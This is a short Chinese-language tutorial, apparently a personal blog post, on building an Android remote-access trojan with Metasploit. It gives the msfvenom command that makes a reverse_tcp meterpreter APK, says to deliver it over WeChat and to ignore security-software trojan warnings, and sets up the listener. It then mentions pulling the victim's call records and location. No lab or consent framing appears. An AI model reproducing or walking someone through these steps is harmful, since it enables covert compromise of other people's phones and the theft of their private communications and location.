PJzhang:metasploit执行android手机木马

猫宁~~~

操作系统centos7，可以本地部署，也可以买一台云服务器，例如腾讯，阿里的，首次购买都不太贵。

使用宝塔SSH终端连接，兼有SFTP上传下载

https://www.bt.cn/download/term.html

下载metasploit程序包

wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run

安装ruby

yum -y install ruby

给予程序运行的权限

chmod +x metasploit-latest-linux-x64-installer.run

执行程序

./metasploit-latest-linux-x64-installer.run

提示continue的回车，提示是否是选择y即可

输入命令，进入，显示安装成功

msfconsole

root目录下执行如下命令，生成muma.apk的文件

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.100.100 LPORT=10000 R > muma.apk

借助微信发送到手机上，安装，如果安全软件提示木马，继续安装就好，app显示名称为MainActivity

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.100.100

set lport 10000

run

获取手机权限

使用help，查看相关的命令操作，如下可以获取对方的通信记录和地理位置信息。

over~~~